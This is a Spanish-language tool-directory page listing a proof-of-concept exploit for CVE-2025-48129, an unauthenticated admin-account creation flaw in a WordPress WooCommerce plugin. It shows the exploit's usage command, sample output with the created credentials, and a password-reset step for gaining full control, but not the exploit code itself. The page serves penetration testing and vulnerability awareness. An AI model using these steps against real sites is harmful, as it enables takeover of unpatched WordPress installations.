Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-48129 — WordPress Spreadsheet Price Changer for WooCommerce and WP E-commerce – Light Plugin <= 2.4.37 es vulnerable a la escalada de privilegios | Kitploit
Herramientas/GitHubGitHub/nxploited/cve-2025-48129
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAutenticación
GitHubnxploited/cve-2025-48129

CVE-2025-48129

WordPress Spreadsheet Price Changer for WooCommerce and WP E-commerce – Light Plugin <= 2.4.37 es vulnerable a la escalada de privilegios

Ver Repositorio
17hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🚨 CVE-2025-48129 - Escalada de Privilegios en el Plugin Spreadsheet Price Changer de WordPress

🛡️ Resumen de la Vulnerabilidad

  • Plugin Afectado: Spreadsheet Price Changer for WooCommerce and WP E-commerce – Light
  • Versiones Vulnerables: <= 2.4.37
  • Versión Parcheada: ❌ No hay corrección oficial disponible
  • Descubierto por: Patchstack | 20 de mayo de 2025
  • ID de CVE: CVE-2025-48129
  • Puntuación CVSS: 9.8 (Crítico)
  • Prioridad de Parche: 🔴 Alta

🔥 Riesgo

Los atacantes no autenticados pueden escalar privilegios creando una cuenta de nivel Administrador sin necesidad de acceso previo. Esto permite tomar el control total del sitio WordPress.

Clasificado bajo: OWASP A7 – Fallas de Identificación y Autenticación


🧪 Resumen del Script de Explotación

Este script de Python ataca versiones vulnerables del plugin y registra un nuevo Administrador de WordPress utilizando solo un correo electrónico y una contraseña (hash mediante MD5).


▶️ Ejemplo de Uso

python CVE-2025-48129.py -u http://target-site.com/wordpress -mail [email protected] -p nxploitadmin

📘 Ayuda de Uso

python CVE-2025-48129.py -help

usage: CVE-2025-48129.py [-h] -u URL -mail MAIL [-p PASSWORD]

CVE-2025-48129 - Unauthenticated Privilege Escalation Exploit by Khaled Alenazi (Nxploited)

options:
  -h, --help              show this help message and exit
  -u, --url URL           Target WordPress site URL (e.g., http://site.com/)
  -mail, --mail MAIL      Email for the new Admin account
  -p, --password PASSWORD Password to set (default: nxploitadmin)

✅ Ejemplo de Salida Exitosa

[*] Checking plugin version...
[*] Plugin version: 2.4.37
[*] Vulnerable version detected. Exploiting...
[+] Exploitation successful!

[*] Login credentials:
    Username: [email protected]
    Password: 21232f297a57a5a743894a0e4a801fc3

[*] If login fails, reset the password manually via:
    http://target-site.com/wordpress/wp-login.php?action=lostpassword

⚠️ Nota Importante

En algunos casos, iniciar sesión directamente con la contraseña elegida puede fallar.
Esto no es un error del exploit, sino un resultado de cómo el plugin vulnerable pasa las contraseñas con hash al sistema interno de creación de usuarios de WordPress.

Si no puedes iniciar sesión, simplemente restablece la contraseña por correo electrónico usando la siguiente URL:

http://target-site.com/wordpress/wp-login.php?action=lostpassword

WordPress enviará un correo electrónico de restablecimiento de contraseña a la cuenta de Administrador que acabas de crear, lo que te otorgará acceso completo.


🧾 Aviso Legal

Esta herramienta se proporciona únicamente con fines educativos y de pruebas de penetración autorizadas.
El autor no asume ninguna responsabilidad por el mal uso o los daños causados por este script.


Por: Nxploited ( Khaled_alenazi )

Descargar herramienta